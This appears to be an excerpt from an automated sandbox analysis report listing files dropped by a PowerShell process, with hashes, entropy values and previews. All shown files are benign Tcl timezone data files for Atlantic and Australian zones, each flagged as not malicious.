                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.910514445868106
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2RQqGsA/8rVDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2RQjQD4
                                                                                                                                                                                                                              MD5:ECB480DA99D29C0ACE67426D45534754
                                                                                                                                                                                                                              SHA1:784CF126B030C3D883EE541877E6181F795C9697
                                                                                                                                                                                                                              SHA-256:BDA015714260001BAE2848991DD21E802580BE2915797E5DABC376135D1C5246
                                                                                                                                                                                                                              SHA-512:54C1B20E45C7C73354DCD4E0F4444720771820ED10B282F745DC391BEADEAEDC629BEF97B1908FB62CDAEC915D32AF1F54FC6AA9DC83E317E7CE19FC2586EF28
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Atlantic/Reykjavik) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):160
                                                                                                                                                                                                                              Entropy (8bit):5.011466665416709
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2RQqGtlN62/EiMXGm2OHXT14YoHvhFvdQVIyV:SlSWB9eg/2RQrlo2MiDm2OHXqYoHvTFS
                                                                                                                                                                                                                              MD5:3B310BB8C90CA716DC1AC5A697ACA9CD
                                                                                                                                                                                                                              SHA1:CD583F49478DCDAD91EF78539502C6FC62945C1E
                                                                                                                                                                                                                              SHA-256:51BFABCB3388107753A3C1A8CF31118E6627132BAA09B9878D9E7CEDBEBB4886
                                                                                                                                                                                                                              SHA-512:F593B7A1FAF0EA6B42D5EE86C20C9A8F5CD7ACD9B30EF7755E45ECAFEA8752C32E4CF4BEDF531F494E59D9F0C49CCC6FCA077292E20794AA265DFC0A56DFE579
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/South_Georgia) {.. {-9223372036854775808 -8768 0 LMT}.. {-2524512832 -7200 0 -02}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.880390141563645
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2RQqGt4r+DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2RQr4rV
                                                                                                                                                                                                                              MD5:2C73A963F515376A46762CE153AAF5C5
                                                                                                                                                                                                                              SHA1:996C3C93DFAD89EA80AC5DFA1DFBD7CECD9ED28D
                                                                                                                                                                                                                              SHA-256:1C9CA8966FC8BD0BE70F4A187E17E56FB99139BC88C392E82BA2E23E23111C54
                                                                                                                                                                                                                              SHA-512:35A9ADC047DB058D71C21FC4ECB57CD14B0D9BA4416506763D1800D72CE6C9E81636F332AAD3533616F05C86F90A60416BD4065C5F832A51AA3DC186218BDCAE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Atlantic/St_Helena) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2256
                                                                                                                                                                                                                              Entropy (8bit):3.662522763865322
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:506KSBSdSs2SbSwGSyPU3lSsS5SGScSo/SkSuShSceS3SBSc7XSiSgSwSd/SJkS6:JKU+Ew0FU1TuhrR//tOIoOjXZfDWSkPR
                                                                                                                                                                                                                              MD5:77C7ECE4FCBE150069B611C75E8DAA0E
                                                                                                                                                                                                                              SHA1:22F4E5F15BCA92D8456B70BB36230F2605CA5E1C
                                                                                                                                                                                                                              SHA-256:F0E99EF01F140CD5AAFE16803A657922207E6F7F6AF10B0AE795790916C302C4
                                                                                                                                                                                                                              SHA-512:6FB57E8499A587292AFAFA9BD003721572393D5268CAF956230DA76983A112B27D6731BE561A22CCEF84935F43AC988B667C2DC404C157EA8D0E7830FC1A2AB8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Stanley) {.. {-9223372036854775808 -13884 0 LMT}.. {-2524507716 -13884 0 SMT}.. {-1824235716 -14400 0 -04}.. {-1018209600 -10800 1 -04}.. {-1003093200 -14400 0 -04}.. {-986760000 -10800 1 -04}.. {-971643600 -14400 0 -04}.. {-954705600 -10800 1 -04}.. {-939589200 -14400 0 -04}.. {-923256000 -10800 1 -04}.. {-908139600 -14400 0 -04}.. {-891806400 -10800 1 -04}.. {-876690000 -14400 0 -04}.. {-860356800 -10800 1 -04}.. {420606000 -7200 0 -03}.. {433303200 -7200 1 -03}.. {452052000 -10800 0 -03}.. {464151600 -7200 1 -03}.. {483501600 -10800 0 -03}.. {495597600 -14400 0 -04}.. {495604800 -10800 1 -04}.. {514350000 -14400 0 -04}.. {527054400 -10800 1 -04}.. {545799600 -14400 0 -04}.. {558504000 -10800 1 -04}.. {577249200 -14400 0 -04}.. {589953600 -10800 1 -04}.. {608698800 -14400 0 -04}.. {621403200 -10800 1 -04}.. {640753200 -14400 0 -
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.862270414049974
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjLkXHAIgoXjLyFvHRL/2QWCCjpMFBx/h4QWCCj1:SlSWB9vsM3yI9kHAIgmON/2DCeMFB/4d
                                                                                                                                                                                                                              MD5:2EF41863430897F45E0CBB51E6A44069
                                                                                                                                                                                                                              SHA1:8E9561060E9509FAF235E5E033FC9C2918E438DB
                                                                                                                                                                                                                              SHA-256:DF7CBDDCBB2F5926A07D19A35739E5B8DCD9733C037F7D1FF95753C28D574674
                                                                                                                                                                                                                              SHA-512:9D3A37D64DCCCA28093C30FAB595690D021FACEC15F351A77CA33A779D645D305A2FA031869F0DE3B0404C498C2C321D3D02E4DC592D3C632F6700F5DCB54900
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Sydney)]} {.. LoadTimeZoneFile Australia/Sydney..}..set TZData(:Australia/ACT) $TZData(:Australia/Sydney)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8372
                                                                                                                                                                                                                              Entropy (8bit):3.894755849491153
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:j8SY62BXovlCyRL8pJXa4NyPaNw0leasxMQ/UvuQPxBFNsLQ2nDs020DdDncIsea:j8X3Xzgl3PaN8asiQ/Uv9UnvtCaRs
                                                                                                                                                                                                                              MD5:94E1A0C4326D09AF103107E64625CC6C
                                                                                                                                                                                                                              SHA1:C026565F020EB158309549D98313632BAA79205F
                                                                                                                                                                                                                              SHA-256:5C43D3152982BCFD5B9F51D0E909CF3A558BED1C270FEFFE030531D38D6F91B7
                                                                                                                                                                                                                              SHA-512:CA08A8BC0EB740D59650FE0A9E56D9E169348AD0994F2BFFD6CCFBF9CC42E82F892FB719E80C4E2084B5702E9725C651359EE3066BD71BB19397EA83B6A68430
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Adelaide) {.. {-9223372036854775808 33260 0 LMT}.. {-2364110060 32400 0 ACST}.. {-2230189200 34200 0 ACST}.. {-1672558200 37800 1 ACDT}.. {-1665387000 34200 0 ACST}.. {-883639800 37800 1 ACDT}.. {-876123000 34200 0 ACST}.. {-860398200 37800 1 ACDT}.. {-844673400 34200 0 ACST}.. {-828343800 37800 1 ACDT}.. {-813223800 34200 0 ACST}.. {31501800 34200 0 ACST}.. {57688200 37800 1 ACDT}.. {67969800 34200 0 ACST}.. {89137800 37800 1 ACDT}.. {100024200 34200 0 ACST}.. {120587400 37800 1 ACDT}.. {131473800 34200 0 ACST}.. {152037000 37800 1 ACDT}.. {162923400 34200 0 ACST}.. {183486600 37800 1 ACDT}.. {194977800 34200 0 ACST}.. {215541000 37800 1 ACDT}.. {226427400 34200 0 ACST}.. {246990600 37800 1 ACDT}.. {257877000 34200 0 ACST}.. {278440200 37800 1 ACDT}.. {289326600 34200 0 ACST}.. {309889800 37800 1 ACDT}.. {320776200 34200 0 ACST}
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):674
                                                                                                                                                                                                                              Entropy (8bit):4.32071371733564
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862ELmdHLOYCvSi0xT0ryRIvUr0obZv:5ELe6dvSi6L
                                                                                                                                                                                                                              MD5:900B39F1D4AB93A445F37B6C0A8DE3D9
                                                                                                                                                                                                                              SHA1:DE82800779DCB8094C395B5024BD01FFA3C3BB8C
                                                                                                                                                                                                                              SHA-256:0D3C39EDAB34A8DB31A658A1549772F7D69EB57565E40AA87B707953A2D854A4
                                                                                                                                                                                                                              SHA-512:8D115D1D14FE6FF21A4AE77E3AAC075E6A877214E568956B9A4FD2E75A46E458CAA5AE26B483F128B4C62960D73BD7543BC32F22B760059423B3D9ABCBA24B6A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Brisbane) {.. {-9223372036854775808 36728 0 LMT}.. {-2366791928 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {625593600 39600 1 AEDT}.. {636480000 36000 0 AEST}.. {657043200 39600 1 AEDT}.. {667929600 36000 0 AEST}.. {688492800 39600 1 AEDT}.. {699379200 36000 0 AEST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8437
                                                                                                                                                                                                                              Entropy (8bit):3.902306256303896
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:QZSSY62BXovldRL8q75aANyPaNw0leasxMQ/UvuQPxBFNsLQ2nDs020DdDncIsea:QZSX3X2QfPaN8asiQ/Uv9UnvtCaRs
                                                                                                                                                                                                                              MD5:1553DAAB804A6C9BB15D711554980D3B
                                                                                                                                                                                                                              SHA1:5E3161B1FBB4C246DCB5E11ABD94095121CE38ED
                                                                                                                                                                                                                              SHA-256:734F295BD0B558BDF6178DE62151B8913699D08AB2B1D101C55B8DEBC410074C
                                                                                                                                                                                                                              SHA-512:06B21886070E39E390ECBD18841B7FDBFCA2C7C8573495D2BAA2B92EB113CD1C73C18D73C49DE3C49572CBCBCBED2FAD3248BC651BEB825A1E089B1DEDEFCBFA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Broken_Hill) {.. {-9223372036854775808 33948 0 LMT}.. {-2364110748 36000 0 AEST}.. {-2314951200 32400 0 ACST}.. {-2230189200 34200 0 ACST}.. {-1672558200 37800 1 ACDT}.. {-1665387000 34200 0 ACST}.. {-883639800 37800 1 ACDT}.. {-876123000 34200 0 ACST}.. {-860398200 37800 1 ACDT}.. {-844673400 34200 0 ACST}.. {-828343800 37800 1 ACDT}.. {-813223800 34200 0 ACST}.. {31501800 34200 0 ACST}.. {57688200 37800 1 ACDT}.. {67969800 34200 0 ACST}.. {89137800 37800 1 ACDT}.. {100024200 34200 0 ACST}.. {120587400 37800 1 ACDT}.. {131473800 34200 0 ACST}.. {152037000 37800 1 ACDT}.. {162923400 34200 0 ACST}.. {183486600 37800 1 ACDT}.. {194977800 34200 0 ACST}.. {215541000 37800 1 ACDT}.. {226427400 34200 0 ACST}.. {246990600 37800 1 ACDT}.. {257877000 34200 0 ACST}.. {278440200 37800 1 ACDT}.. {289326600 34200 0 ACST}.. {309889800 37800 1
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):195
                                                                                                                                                                                                                              Entropy (8bit):4.851279484907769
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjLkXHAIgoXjLyFvHRL/2QWCCjnSV1+QWCCjLBn:SlSWB9vsM3yI9kHAIgmON/2DCcq+DCyB
                                                                                                                                                                                                                              MD5:8944D3DF8FBECC03A8FB18C3B2DA3B53
                                                                                                                                                                                                                              SHA1:6B17B38D6560592CA49840C47DB9BDA7E79F9F76
                                                                                                                                                                                                                              SHA-256:5FE3CED97293FE0573D5ECE0CEF59CE5DDB4C57BC568AE7199E77B01D3ADE17C
                                                                                                                                                                                                                              SHA-512:907D8BB7EA840E0B3AC683884F2F709A2C06D67CE9258BE46400A0DA63581A9B1403A44FA43E1059BE8F5C7E06F9FA05C176309AD6295317BF14F0E9FA5741E4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Sydney)]} {.. LoadTimeZoneFile Australia/Sydney..}..set TZData(:Australia/Canberra) $TZData(:Australia/Sydney)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):193
                                                                                                                                                                                                                              Entropy (8bit):4.79231670095588
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yI4DVJHAIgxnvVWAN/2DCkx+4DCVDy:MByMjUQVv8At2s4Ky
                                                                                                                                                                                                                              MD5:0C1DFC0877CE8EB08007B7C2B7AF2D87
                                                                                                                                                                                                                              SHA1:02F835BE2DA4FCA79DC2A6959BB4EB6ACC8DF708
                                                                                                                                                                                                                              SHA-256:1DD4EC4ED4F854E2EF6162B2F28C89208710F8EC5AABB95FFA9425D3FBBCAB13
                                                                                                                                                                                                                              SHA-512:358347045915B7D10940DB15E49528D0C636BEC1BE70129847D0B9D034F9E96E847394D88358E87D98A9E581605A3C2AB917B85FDE1296F290B4194BB7E3FA46
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Hobart)]} {.. LoadTimeZoneFile Australia/Hobart..}..set TZData(:Australia/Currie) $TZData(:Australia/Hobart)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):437
                                                                                                                                                                                                                              Entropy (8bit):4.508468081487136
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862pmdHPCvZUjMWpXgda/gd026Xgdvgd+v:5peKvZqMSX+4+56X+v+Q
                                                                                                                                                                                                                              MD5:A81864B2C0BD7BF81F4FA21F17800059
                                                                                                                                                                                                                              SHA1:518AC9E040A17083ED3962F4FBB47D1D83764FF7
                                                                                                                                                                                                                              SHA-256:AC004FD4B3C536406991EC13EBB3E64E0EC0C7B264BC18C0700C8FA545868155
                                                                                                                                                                                                                              SHA-512:3C24F4C2CC3072B3E820FCC1C68A747DCCBB9481FE743C1555783CC932DCBA44FE4851A732D24EABF62E845474D4E1278F120A04DB7549A18C7C49C31FB8D425
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Darwin) {.. {-9223372036854775808 31400 0 LMT}.. {-2364108200 32400 0 ACST}.. {-2230189200 34200 0 ACST}.. {-1672558200 37800 1 ACDT}.. {-1665387000 34200 0 ACST}.. {-883639800 37800 1 ACDT}.. {-876123000 34200 0 ACST}.. {-860398200 37800 1 ACDT}.. {-844673400 34200 0 ACST}.. {-828343800 37800 1 ACDT}.. {-813223800 34200 0 ACST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):759
                                                                                                                                                                                                                              Entropy (8bit):4.110997549215461
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862EmdHvOYCvV2mV22wF2nUV2CF2+V2pCwF21UF2biV2cHVKF25V2VF2cV2tFq:5Eemdvg2wQCKZ4j5c0LVmtH1iknohwQT
                                                                                                                                                                                                                              MD5:1BC8DBD2E24606EFA49F933034FC0EEF
                                                                                                                                                                                                                              SHA1:A511695A1B87A689C6BFF65257C11D3962FDDA3D
                                                                                                                                                                                                                              SHA-256:79D0C770A304360DB33F3D1EF7B3935F1E4E8125893E0DCE683AC35A51302CFB
                                                                                                                                                                                                                              SHA-512:A839D390D70F22FC833322029B732F3AE68FF48793B07005041BD12322DD6E5D5E5FF31787AA004A507A57F8FC245133891F266C4EF19D49F085E6B412E5B04C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Eucla) {.. {-9223372036854775808 30928 0 LMT}.. {-2337928528 31500 0 +0945}.. {-1672555500 35100 1 +0945}.. {-1665384300 31500 0 +0945}.. {-883637100 35100 1 +0945}.. {-876120300 31500 0 +0945}.. {-860395500 35100 1 +0945}.. {-844670700 31500 0 +0945}.. {-836473500 35100 0 +0945}.. {152039700 35100 1 +0945}.. {162926100 31500 0 +0945}.. {436295700 35100 1 +0945}.. {447182100 31500 0 +0945}.. {690311700 35100 1 +0945}.. {699383700 31500 0 +0945}.. {1165079700 35100 1 +0945}.. {1174756500 31500 0 +0945}.. {1193505300 35100 1 +0945}.. {1206810900 31500 0 +0945}.. {1224954900 35100 1 +0945}.. {1238260500 31500 0 +0945}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8734
                                                                                                                                                                                                                              Entropy (8bit):3.8515786470328823
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:aOqigkx6WsYyS39nQiAmcO38EJ8i/V9cYgCqMEjKeIZ3wQb25Ly04:aOq05hnQiAmcOM6e0pj
                                                                                                                                                                                                                              MD5:5E04BF8E1DEBFCC4130FDD1BBD67B2DF
                                                                                                                                                                                                                              SHA1:796AADCE7BB2FAF5E6FC916C941A4E3DCAFACC9E
                                                                                                                                                                                                                              SHA-256:D813F6A97BEFC22CA4F24C59EB755D269B9C68A449CC7CF0D2C61F911860EBE7
                                                                                                                                                                                                                              SHA-512:3A69CF1D1F57D6BD39E5F4DAF76BBB06A749D42BEB29452A0A5BDAA68F5DACC0DF176EDDA7A083F5B5B84FC651926C09D46CAAD2F6C4F1595AB9CCA1A958D653
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Hobart) {.. {-9223372036854775808 35356 0 LMT}.. {-2345795356 36000 0 AEST}.. {-1680508800 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-1646640000 39600 1 AEDT}.. {-1635753600 36000 0 AEST}.. {-1615190400 39600 1 AEDT}.. {-1604304000 36000 0 AEST}.. {-1583920800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {-94730400 36000 0 AEST}.. {-71136000 39600 1 AEDT}.. {-55411200 36000 0 AEST}.. {-37267200 39600 1 AEDT}.. {-25776000 36000 0 AEST}.. {-5817600 39600 1 AEDT}.. {5673600 36000 0 AEST}.. {25632000 39600 1 AEDT}.. {37728000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {89136000 39600 1 AEDT}.. {100022400 36000 0 AEST}.. {120585600 39600 1 AEDT}.. {131472000 36000 0 AES
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):199
                                                                                                                                                                                                                              Entropy (8bit):4.912882643701746
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yIoGEoPHAIgjGg6N/2DCkx/2DCPGUv:MByMjeXV6t2a8v
                                                                                                                                                                                                                              MD5:425DC7B1E31F4AA41DAD74E3C9AE3562
                                                                                                                                                                                                                              SHA1:D92A3269F7BF5EC00F082C64CEF6E20C43017180
                                                                                                                                                                                                                              SHA-256:4D84E4040FBC529C9E0366BB74D0CFADEEEEDA0DFCC6C2C9204DED6C6455CAC3
                                                                                                                                                                                                                              SHA-512:F3031F16C0D00D9F8A38CD378F599EB3E63F4FF85F120DB38E3013E93F08E6F512D969F164BBC88CD625910FB3E086F3352E5B8FFC1373C3CC98F363FB3FD3F7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Lord_Howe)]} {.. LoadTimeZoneFile Australia/Lord_Howe..}..set TZData(:Australia/LHI) $TZData(:Australia/Lord_Howe)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):824
                                                                                                                                                                                                                              Entropy (8bit):4.249672335529665
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862gtmdHVCvCi0xT0ryRIvUr0obbty/ywtUj3yv:5gteMvCi6Xlt8
                                                                                                                                                                                                                              MD5:504A422280E0459A2126E7CB02F527E6
                                                                                                                                                                                                                              SHA1:EF61B98EFB1E44EE59020E99A69EA67D6B8ACFC2
                                                                                                                                                                                                                              SHA-256:01B278309353849CC2FDF62A30E2FF483833D5713CF5E329252738BE6F2C0A84
                                                                                                                                                                                                                              SHA-512:BFDAAD56D817CD3AAB17DFD0A33EFDD422645BC542ABE269C0F8520E33796DF4F19EAB2E40BFC6C4AF93EF654239B8F2E285639B4662040D865B9C340A23CFAD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Lindeman) {.. {-9223372036854775808 35756 0 LMT}.. {-2366790956 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {625593600 39600 1 AEDT}.. {636480000 36000 0 AEST}.. {657043200 39600 1 AEDT}.. {667929600 36000 0 AEST}.. {688492800 39600 1 AEDT}.. {699379200 36000 0 AEST}.. {709912800 36000 0 AEST}.. {719942400 39600 1 AEDT}.. {731433600 36000 0 AEST}.. {751996800 39600 1 AEDT}.. {762883200 36000 0 AEST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7764
                                                                                                                                                                                                                              Entropy (8bit):3.5615258807990537
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:pmz39IyKxb/JbcD9gKniAF23QbNS1fEGXALNbbT2JFJ/FaKaTQ9ZJhRVK:p+cpVKniAF2AbkFKL
                                                                                                                                                                                                                              MD5:10F983F4683CDE13A1228AC0B04D8513
                                                                                                                                                                                                                              SHA1:45378BA5949BE53D698108F50FECFF50C9E3D296
                                                                                                                                                                                                                              SHA-256:76D1F1ED67B8F8D6903789C2FDDF79590A83677972D416F5F3C9687614EC6238
                                                                                                                                                                                                                              SHA-512:D60D802EF215A33750E4F859657BA12A67084B1E9FCF1B4A7CEEE7B9D816BC2C6670775D93C88EC8380CDD7790AD574133D6F90F0828F848313C26583B2F196A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Lord_Howe) {.. {-9223372036854775808 38180 0 LMT}.. {-2364114980 36000 0 AEST}.. {352216800 37800 0 +1030}.. {372785400 41400 1 +1030}.. {384273000 37800 0 +1030}.. {404839800 41400 1 +1030}.. {415722600 37800 0 +1030}.. {436289400 41400 1 +1030}.. {447172200 37800 0 +1030}.. {467739000 41400 1 +1030}.. {478621800 37800 0 +1030}.. {488984400 37800 0 +1030}.. {499188600 39600 1 +1030}.. {511282800 37800 0 +1030}.. {530033400 39600 1 +1030}.. {542732400 37800 0 +1030}.. {562087800 39600 1 +1030}.. {574786800 37800 0 +1030}.. {594142200 39600 1 +1030}.. {606236400 37800 0 +1030}.. {625591800 39600 1 +1030}.. {636476400 37800 0 +1030}.. {657041400 39600 1 +1030}.. {667926000 37800 0 +1030}.. {688491000 39600 1 +1030}.. {699375600 37800 0 +1030}.. {719940600 39600 1 +1030}.. {731430000 37800 0 +1030}.. {751995000 39600 1 +1030}.. {762
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8341
                                                                                                                                                                                                                              Entropy (8bit):3.8532171550973526
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Yyigkp2EUyn8/dnQiAmcO38EJ8i/V9cYgCqMEjKeIZ3wQb25Ly04:Yy3VnQiAmcOM6e0pj
                                                                                                                                                                                                                              MD5:40D06B80A4A0DB415270EFD9698B97BF
                                                                                                                                                                                                                              SHA1:1999F0E8C7EBAA11BD21D64D9E07FA911F13C64C
                                                                                                                                                                                                                              SHA-256:F21B9EA51C0D41BAD0420FE0601E5A4B491FB895856F4BDDF6541D704469D92F
                                                                                                                                                                                                                              SHA-512:E47D597CC85D177CF2804C44C216EB4C5B74472457F15F697704311A847BF8A051DCAFD26FA61DD689555F35640151E26F25D5DC5319EFEFEA62AD86657A4A95
                                                                                                                                                                                                                              Malicious:false
